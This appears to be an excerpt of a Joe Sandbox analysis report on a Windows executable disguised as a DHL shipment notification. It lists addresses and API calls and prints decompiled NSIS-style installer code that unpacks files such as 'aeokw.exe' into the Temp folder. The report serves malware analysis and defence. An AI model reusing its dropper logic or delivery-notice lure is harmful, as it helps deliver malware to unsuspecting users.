                        0x00404404
                        0x0040440a
                        0x0040441f
                        0x0040440c
                        0x00404415
                        0x00404417
                        0x00404417
                        0x00404425
                        0x00404436
                        0x0040444c
                        0x00404453
                        0x00404459
                        0x0040445d
                        0x00404462
                        0x00404464
                        0x00000000
                        0x0040446a
                        0x0040446a
                        0x0040446c
                        0x00000000
                        0x00000000
                        0x00404472
                        0x00404476
                        0x0040449b
                        0x004044a1
                        0x004044a7
                        0x004044a9
                        0x00000000
                        0x00000000
                        0x004044cf
                        0x004044d5
                        0x004044d7
                        0x004044dc
                        0x00000000
                        0x00000000
                        0x004044e2
                        0x004044e5
                        0x004044e8
                        0x004044ff
                        0x0040450b
                        0x00404524
                        0x0040452a
                        0x0040452e
                        0x00404533
                        0x00404539
                        0x00000000
                        0x00000000
                        0x00404543
                        0x0040454e
                        0x00000000
                        0x0040454e
                        0x00404478
                        0x0040447e
                        0x00000000
                        0x00000000
                        0x00404484
                        0x0040448a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404490
                        0x00404464
                        0x0040455b
                        0x00404567
                        0x0040456e
                        0x00000000
                        0x004042b9
                        0x004042b9
                        0x004042bc
                        0x004042ef
                        0x004042ef
                        0x004042f1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004042f1
                        0x004042be
                        0x004042c2
                        0x004042c7
                        0x004042c9
                        0x00000000
                        0x00000000
                        0x004042d9
                        0x004042e1
                        0x00000000
                        0x004042e7
                        0x004040ef
                        0x004040ef
                        0x004040f3
                        0x004040f8
                        0x00404107
                        0x00404107
                        0x0040410d
                        0x00404114
                        0x00404158
                        0x0040415e
                        0x00404177
                        0x0040417a
                        0x0040418d
                        0x00404193
                        0x00000000
                        0x00000000
                        0x00404199
                        0x004041a4
                        0x004041a6
                        0x004041a8
                        0x004041c7
                        0x004041c7
                        0x004041ca
                        0x004041cf
                        0x004041d2
                        0x004041e2
                        0x004041e3
                        0x004041e5
                        0x0040421b
                        0x0040422b
                        0x00000000
                        0x0040422b
                        0x004041e7
                        0x004041ed
                        0x00404206
                        0x0040420b
                        0x0040420d
                        0x00000000
                        0x00000000
                        0x0040420f
                        0x004041fb
                        0x004041fb
                        0x004041fd
                        0x004041fd
                        0x00000000
                        0x004041fd
                        0x004041f0
                        0x004041f5
                        0x00000000
                        0x004041f5
                        0x004041d4
                        0x004041da
                        0x00000000
                        0x00000000
                        0x004041dc
                        0x00000000
                        0x004041dc
                        0x004041cc
                        0x00000000
                        0x004041cc
                        0x004041b2
                        0x004041b9
                        0x004041bf
                        0x004041c1
                        0x00404597
                        0x00000000
                        0x00404597
                        0x00000000
                        0x004041c1
                        0x0040417f
                        0x00000000
                        0x00404187
                        0x00404166
                        0x0040416c
                        0x00404574
                        0x0040457a
                        0x00404587
                        0x0040458d
                        0x0040458d
                        0x00000000
                        0x00404116
                        0x0040411b
                        0x00404127
                        0x00404130
                        0x00404231
                        0x00000000
                        0x0040414f
                        0x00404152
                        0x00000000
                        0x00404152
                        0x00404130
                        0x00404114

                        APIs
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
                        • ShowWindow.USER32(?), ref: 00404127
                        • GetWindowLongW.USER32(?,000000F0), ref: 00404139
                        • ShowWindow.USER32(?,00000004), ref: 00404152
                        • DestroyWindow.USER32 ref: 00404166
                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040417F
                        • GetDlgItem.USER32 ref: 0040419E
                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
                        • IsWindowEnabled.USER32(00000000), ref: 004041B9
                        • GetDlgItem.USER32 ref: 00404264
                        • GetDlgItem.USER32 ref: 0040426E
                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404288
                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
                        • GetDlgItem.USER32 ref: 0040437F
                        • ShowWindow.USER32(00000000,?), ref: 004043A0
                        • EnableWindow.USER32(?,?), ref: 004043B2
                        • EnableWindow.USER32(?,?), ref: 004043CD
                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043E3
                        • EnableMenuItem.USER32 ref: 004043EA
                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
                        • lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
                        • SetWindowTextW.USER32(?,007A1F88), ref: 00404453
                        • ShowWindow.USER32(?,0000000A), ref: 00404587
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                        • String ID:
                        • API String ID: 2475350683-0
                        • Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                        • Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
                        • Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                        • Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403D1D Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 248 403d1d-403d35 call 406a3b 251 403d37-403d42 GetUserDefaultUILanguage call 4065b5 248->251 252 403d49-403d80 call 40653c 248->252 255 403d47 251->255 258 403d82-403d93 call 40653c 252->258 259 403d98-403d9e lstrcatW 252->259 257 403da3-403dcc call 403ff3 call 406045 255->257 265 403dd2-403dd7 257->265 266 403e5e-403e66 call 406045 257->266 258->259 259->257 265->266 267 403ddd-403e05 call 40653c 265->267 272 403e74-403e99 LoadImageW 266->272 273 403e68-403e6f call 4066ab 266->273 267->266 274 403e07-403e0b 267->274 276 403f1a-403f22 call 40140b 272->276 277 403e9b-403ecb RegisterClassW 272->277 273->272 278 403e1d-403e29 lstrlenW 274->278 279 403e0d-403e1a call 405f6a 274->279 290 403f24-403f27 276->290 291 403f2c-403f37 call 403ff3 276->291 280 403ed1-403f15 SystemParametersInfoW CreateWindowExW 277->280 281 403fe9 277->281 285 403e51-403e59 call 405f3d call 40666e 278->285 286 403e2b-403e39 lstrcmpiW 278->286 279->278 280->276 284 403feb-403ff2 281->284 285->266 286->285 289 403e3b-403e45 GetFileAttributesW 286->289 294 403e47-403e49 289->294 295 403e4b-403e4c call 405f89 289->295 290->284 300 403fc0-403fc8 call 4057a3 291->300 301 403f3d-403f57 ShowWindow call 4069cb 291->301 294->285 294->295 295->285 306 403fe2-403fe4 call 40140b 300->306 307 403fca-403fd0 300->307 308 403f63-403f75 GetClassInfoW 301->308 309 403f59-403f5e call 4069cb 301->309 306->281 307->290 310 403fd6-403fdd call 40140b 307->310 313 403f77-403f87 GetClassInfoW RegisterClassW 308->313 314 403f8d-403fb0 DialogBoxParamW call 40140b 308->314 309->308 310->290 313->314 318 403fb5-403fbe call 403c6d 314->318 318->284
                        C-Code - Quality: 96%
                        			E00403D1D(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8ab0;
				_t22 = E00406A3B(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f88;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
					__eflags =  *0x7a1f88;
					if(__eflags == 0) {
						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E004065B5(L"1033", _t73 & 0x0000ffff);
				}
				E00403FF3(_t78, _t90);
				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
				 *0x7a8b3c = 0x10000;
				if(E00406045(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00406045(_t98, _t86) == 0) {
						E004066AB(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a7a88 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FF3(_t78, __eflags);
							__eflags =  *0x7a8b40;
							if( *0x7a8b40 != 0) {
								_t33 = E004057A3(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a7a6c;
								if( *0x7a7a6c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f68, 5); // executed
							_t39 = E004069CB("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069CB("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
								 *0x7a7a64 = _t87;
								RegisterClassW(0x7a7a40);
							}
							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
							E00403C6D(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8aa0;
						 *0x7a7a44 = E00401000;
						 *0x7a7a50 =  *0x7a8aa0;
						 *0x7a7a54 = _t30;
						 *0x7a7a64 = 0x40a3b4;
						if(RegisterClassW(0x7a7a40) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x7a6a40;
					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
					_t63 =  *0x7a6a40; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a6a42;
						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040666E(_t86, E00405F3D(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F89(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                        0x00403d23
                        0x00403d2c
                        0x00403d33
                        0x00403d35
                        0x00403d49
                        0x00403d5b
                        0x00403d64
                        0x00403d6d
                        0x00403d74
                        0x00403d79
                        0x00403d80
                        0x00403d93
                        0x00403d93
                        0x00403d9e
                        0x00403d37
                        0x00403d37
                        0x00403d42
                        0x00403d42
                        0x00403da3
                        0x00403dad
                        0x00403db6
                        0x00403dbb
                        0x00403dcc
                        0x00403e5e
                        0x00403e66
                        0x00403e6f
                        0x00403e6f
                        0x00403e85
                        0x00403e8b
                        0x00403e99
                        0x00403f1a
                        0x00403f22
                        0x00403f2c
                        0x00403f31
                        0x00403f37
                        0x00403fc1
                        0x00403fc6
                        0x00403fc8
                        0x00403fe4
                        0x00000000
                        0x00403fe4
                        0x00403fca
                        0x00403fd0
                        0x00403fd8
                        0x00403fd8
                        0x00000000
                        0x00403fd0
                        0x00403f45
                        0x00403f50
                        0x00403f55
                        0x00403f57
                        0x00403f5e
                        0x00403f5e
                        0x00403f69
                        0x00403f71
                        0x00403f73
                        0x00403f75
                        0x00403f7e
                        0x00403f81
                        0x00403f87
                        0x00403f87
                        0x00403fa6
                        0x00403fb7
                        0x00000000
                        0x00403fbc
                        0x00403f24
                        0x00403f26
                        0x00000000
                        0x00403e9b
                        0x00403e9b
                        0x00403ea7
                        0x00403eb1
                        0x00403eb7
                        0x00403ebc
                        0x00403ecb
                        0x00403fe9
                        0x00403fe9
                        0x00000000
                        0x00403fe9
                        0x00403eda
                        0x00403f15
                        0x00000000
                        0x00403f15
                        0x00403dd2
                        0x00403dd2
                        0x00403dd5
                        0x00403dd7
                        0x00000000
                        0x00000000
                        0x00403de5
                        0x00403df7
                        0x00403dfc
                        0x00403e05
                        0x00000000
                        0x00000000
                        0x00403e0b
                        0x00403e0d
                        0x00403e1a
                        0x00403e1a
                        0x00403e23
                        0x00403e29
                        0x00403e51
                        0x00403e59
                        0x00000000
                        0x00403e3b
                        0x00403e3c
                        0x00403e45
                        0x00403e4b
                        0x00403e4c
                        0x00000000
                        0x00403e4c
                        0x00403e47
                        0x00403e49
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403e49
                        0x00403e29

                        APIs
                          • Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                          • Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                        • GetUserDefaultUILanguage.KERNELBASE(00000002,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D37
                          • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                        • lstrcatW.KERNEL32(1033,007A1F88), ref: 00403D9E
                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,?,?,?,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,76CDFAA0), ref: 00403E1E
                        • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,?,?,?,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,?,00000000,?), ref: 00403E3C
                        • LoadImageW.USER32 ref: 00403E85
                        • RegisterClassW.USER32 ref: 00403EC2
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403EDA
                        • CreateWindowExW.USER32 ref: 00403F0F
                        • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F45
                        • GetClassInfoW.USER32 ref: 00403F71
                        • GetClassInfoW.USER32 ref: 00403F7E
                        • RegisterClassW.USER32 ref: 00403F87
                        • DialogBoxParamW.USER32 ref: 00403FA6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                        • String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                        • API String ID: 606308-1545440408
                        • Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                        • Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
                        • Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                        • Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 202memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 321 4030d0-40311e GetTickCount GetModuleFileNameW call 40615e 324 403120-403125 321->324 325 40312a-403158 call 40666e call 405f89 call 40666e GetFileSize 321->325 326 403370-403374 324->326 333 403246-403254 call 40302e 325->333 334 40315e-403175 325->334 340 403328-40332d 333->340 341 40325a-40325d 333->341 336 403177 334->336 337 403179-403186 call 4035e8 334->337 336->337 345 4032e4-4032ec call 40302e 337->345 346 40318c-403192 337->346 340->326 343 403289-4032d8 GlobalAlloc call 40618d CreateFileW 341->343 344 40325f-403277 call 4035fe call 4035e8 341->344 362 4032da-4032df 343->362 363 4032ee-40331e call 4035fe call 403377 343->363 344->340 373 40327d-403283 344->373 345->340 350 403212-403216 346->350 351 403194-4031ac call 406119 346->351 354 403218-40321e call 40302e 350->354 355 40321f-403225 350->355 351->355 365 4031ae-4031b5 351->365 354->355 360 403227-403235 call 406b28 355->360 361 403238-403240 355->361 360->361 361->333 361->334 362->326 377 403323-403326 363->377 365->355 371 4031b7-4031be 365->371 371->355 374 4031c0-4031c7 371->374 373->340 373->343 374->355 376 4031c9-4031d0 374->376 376->355 378 4031d2-4031f2 376->378 377->340 379 40332f-403340 377->379 378->340 380 4031f8-4031fc 378->380 381 403342 379->381 382 403348-40334d 379->382 383 403204-40320c 380->383 384 4031fe-403202 380->384 381->382 385 40334e-403354 382->385 383->355 386 40320e-403210 383->386 384->333 384->383 385->385 387 403356-40336e call 406119 385->387 386->355 387->326
                        C-Code - Quality: 97%
                        			E004030D0(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t61;
				intOrPtr _t64;
				void* _t67;
				intOrPtr* _t69;
				long _t81;
				signed int _t88;
				intOrPtr _t91;
				void* _t94;
				void* _t99;
				void* _t103;
				long _t104;
				long _t107;
				void* _t108;

				_v8 = 0;
				_v12 = 0;
				 *0x7a8aac = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe", 0x400);
				_t103 = E0040615E(L"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe", 0x80000000, 3);
				 *0x40a018 = _t103;
				if(_t103 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040666E(L"C:\\Users\\jones\\Desktop", L"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe");
				E0040666E(0x7b7000, E00405F89(L"C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t103, 0);
				 *0x79f740 = _t54;
				_t107 = _t54;
				if(_t54 <= 0) {
					L22:
					E0040302E(1);
					_pop(_t94);
					if( *0x7a8ab4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t108 = _t57;
						 *0x40ce78 = 0xb;
						 *0x40ce90 = 0; // executed
						E0040618D(_t94,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t61;
						if(_t61 != 0xffffffff) {
							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
							 *0x79f744 = _t64;
							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
							if(_t67 == _v20) {
								 *0x7a8ab0 = _t108;
								 *0x7a8ab8 =  *_t108;
								if((_v40 & 0x00000001) != 0) {
									 *0x7a8abc =  *0x7a8abc + 1;
								}
								_t45 = _t108 + 0x44; // 0x44
								_t69 = _t45;
								_t99 = 8;
								do {
									_t69 = _t69 - 8;
									 *_t69 =  *_t69 + _t108;
									_t99 = _t99 - 1;
								} while (_t99 != 0);
								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
								E00406119(0x7a8ac0, _t108 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035FE( *0x79f730);
					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t104 = _t107;
						asm("sbb eax, eax");
						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
						if(_t107 >= _t81) {
							_t104 = _t81;
						}
						if(E004035E8(0x797730, _t104) == 0) {
							E0040302E(1);
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x7a8ab4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L19;
						}
						E00406119( &_v40, 0x797730, 0x1c);
						_t88 = _v40;
						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t88;
							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
							_t91 = _v16;
							 *0x7a8ab4 =  *0x79f730;
							if(_t91 > _t107) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t107 = _t91 - 4;
								if(_t104 > _t107) {
									_t104 = _t107;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t107 <  *0x79f740) {
							_v8 = E00406B28(_v8, 0x797730, _t104);
						}
						 *0x79f730 =  *0x79f730 + _t104;
						_t107 = _t107 - _t104;
					} while (_t107 != 0);
					goto L22;
				}
			}




























                        0x004030de
                        0x004030e1
                        0x004030fb
                        0x00403100
                        0x00403113
                        0x00403118
                        0x0040311e
                        0x00000000
                        0x00403120
                        0x00403131
                        0x00403142
                        0x00403149
                        0x00403151
                        0x00403156
                        0x00403158
                        0x00403246
                        0x00403248
                        0x00403253
                        0x00403254
                        0x00000000
                        0x00000000
                        0x0040325d
                        0x00403289
                        0x0040328e
                        0x00403294
                        0x004032a2
                        0x004032a9
                        0x004032af
                        0x004032ca
                        0x004032d3
                        0x004032d8
                        0x004032f7
                        0x00403307
                        0x00403319
                        0x0040331e
                        0x00403326
                        0x00403333
                        0x0040333b
                        0x00403340
                        0x00403342
                        0x00403342
                        0x0040334a
                        0x0040334a
                        0x0040334d
                        0x0040334e
                        0x0040334e
                        0x00403351
                        0x00403353
                        0x00403353
                        0x0040335d
                        0x00403369
                        0x00000000
                        0x0040336e
                        0x00000000
                        0x00403326
                        0x00000000
                        0x004032da
                        0x00403265
                        0x00403277
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040315e
                        0x0040315e
                        0x00403163
                        0x00403167
                        0x0040316e
                        0x00403175
                        0x00403177
                        0x00403177
                        0x00403186
                        0x004032e6
                        0x00403328
                        0x00000000
                        0x00403328
                        0x00403192
                        0x00403216
                        0x00403219
                        0x0040321e
                        0x00000000
                        0x00403216
                        0x0040319f
                        0x004031a4
                        0x004031ac
                        0x004031d2
                        0x004031e1
                        0x004031e7
                        0x004031ec
                        0x004031f2
                        0x00000000
                        0x00000000
                        0x004031fc
                        0x00403204
                        0x00403207
                        0x0040320c
                        0x0040320e
                        0x0040320e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004031fc
                        0x0040321f
                        0x00403225
                        0x00403235
                        0x00403235
                        0x00403238
                        0x0040323e
                        0x0040323e
                        0x00000000
                        0x0040315e

                        APIs
                        • GetTickCount.KERNEL32 ref: 004030E4
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,00000400), ref: 00403100
                          • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,80000000,00000003), ref: 00406162
                          • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                        • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,80000000,00000003), ref: 00403149
                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
